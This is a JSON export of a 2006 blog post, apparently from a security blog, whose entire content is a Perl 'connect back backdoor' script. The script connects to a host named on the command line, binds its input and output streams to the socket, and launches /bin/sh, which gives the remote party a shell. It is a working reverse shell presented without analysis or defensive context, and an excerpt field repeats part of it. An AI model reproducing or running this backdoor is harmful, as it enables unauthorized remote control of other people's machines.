{"id":113,"date":"2006-06-12T18:55:30","date_gmt":"2006-06-12T22:55:30","guid":{"rendered":"http:\/\/blogs.law.harvard.edu\/zeroday\/2006\/06\/12\/data-cha0s-connect-back-backdoor\/"},"modified":"2006-06-12T18:55:30","modified_gmt":"2006-06-12T22:55:30","slug":"data-cha0s-connect-back-backdoor","status":"publish","type":"post","link":"https:\/\/archive.blogs.harvard.edu\/zeroday\/2006\/06\/12\/data-cha0s-connect-back-backdoor\/","title":{"rendered":"Data Cha0s Connect Back Backdoor"},"content":{"rendered":"<pre>\r\n#!\/usr\/bin\/perl\r\nuse Socket;\r\nprint \"Data Cha0s Connect Back Backdoor\\n\\n\";\r\nif (!$ARGV[0]) {\r\n  printf \"Usage: $0 [Host] \\n\";\r\n  exit(1);\r\n}\r\nprint \"[*] Dumping Arguments\\n\";\r\n$host = $ARGV[0];\r\n$port = 80;\r\nif ($ARGV[1]) {\r\n  $port = $ARGV[1];\r\n}\r\nprint \"[*] Connecting...\\n\";\r\n$proto = getprotobyname('tcp') || die(\"Unknown Protocol\\n\");\r\nsocket(SERVER, PF_INET, SOCK_STREAM, $proto) || die (\"Socket Error\\n\");\r\nmy $target = inet_aton($host);\r\nif (!connect(SERVER, pack \"SnA4x8\", 2, $port, $target)) {\r\n  die(\"Unable to Connect\\n\");\r\n}\r\nprint \"[*] Spawning Shell\\n\";\r\nif (!fork( )) {\r\n  open(STDIN,\"&gt;&amp;SERVER\");\r\n  open(STDOUT,\"&gt;&amp;SERVER\");\r\n  open(STDERR,\"&gt;&amp;SERVER\");\r\n  exec {'\/bin\/sh'} '-bash' . \"\" x 4;\r\n  exit(0);\r\n}\r\nprint \"[*] Datached\\n\\n\";\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>#!\/usr\/bin\/perl use Socket; print &#8220;Data Cha0s Connect Back Backdoor\\n\\n&#8221;; if (!$ARGV[0]) { printf &#8220;Usage: $0 [Host] \\n&#8221;; exit(1); } print &#8220;[*] Dumping Arguments\\n&#8221;; $host = $ARGV[0]; $port = 80; if ($ARGV[1]) { $port = $ARGV[1]; } print &#8220;[*] Connecting&#8230;\\n&#8221;; $proto = getprotobyname(&#8216;tcp&#8217;) || die(&#8220;Unknown Protocol\\n&#8221;); socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die (&#8220;Socket Error\\n&#8221;); my $target [&hellip;]<\/p>\n","protected":false},"author":214,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[272],"tags":[],"class_list":["post-113","post","type-post","status-publish","format-standard","hentry","category-digital-warfare"],"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts\/113","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/users\/214"}],"replies":[{"embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/comments?post=113"}],"version-history":[{"count":0,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts\/113\/revisions"}],"wp:attachment":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/media?parent=113"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/categories?post=113"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/tags?post=113"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}